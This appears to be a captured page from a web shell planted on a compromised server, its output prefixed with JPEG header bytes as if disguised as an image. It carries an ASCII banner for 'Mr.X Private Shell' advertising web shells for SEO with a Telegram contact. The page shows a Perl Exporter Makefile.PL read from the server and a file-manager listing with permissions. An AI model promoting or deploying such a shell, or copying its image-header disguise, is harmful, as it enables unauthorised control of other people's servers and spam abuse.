����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
use 5.006;
use ExtUtils::MakeMaker;
my $EUMM_VERSION = $ExtUtils::MakeMaker::VERSION;
$EUMM_VERSION =~ s/_//g;
WriteMakefile(
NAME => 'Exporter',
VERSION_FROM => 'lib/Exporter.pm',
( $] > 5.011 ) ? () : ( INSTALLDIRS => 'perl' ), # CPAN sourced versions should now install to site
PREREQ_PM => {
'Carp' => '1.05',
},
ABSTRACT_FROM => 'lib/Exporter.pm',
( $EUMM_VERSION >= 6.31 ? ( LICENSE => 'perl_5' ) : () ),
dist => { COMPRESS => 'gzip -9f', SUFFIX => 'gz', },
META_MERGE => {
recommends => {
'Test::Pod' => 1.18,
'Test::Pod::Coverage' => 1.04
},
resources => {
license => 'http://dev.perl.org/licenses/',
bugtracker => 'https://github.com/Perl/perl5/issues',
repository => 'https://github.com/Perl/perl5/tree/blead/dist/Exporter',
MailingList => 'http://lists.perl.org/list/perl5-porters.html',
},
},
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| Changes | File | 4 KB | 0644 |
|
| MANIFEST | File | 315 B | 0644 |
|
| MANIFEST.SKIP | File | 86 B | 0644 |
|
| META.json | File | 1.36 KB | 0644 |
|
| META.yml | File | 833 B | 0644 |
|
| MYMETA.json | File | 1.36 KB | 0644 |
|
| MYMETA.yml | File | 833 B | 0644 |
|
| Makefile | File | 29.85 KB | 0644 |
|
| Makefile.PL | File | 995 B | 0644 |
|
| README | File | 16.72 KB | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|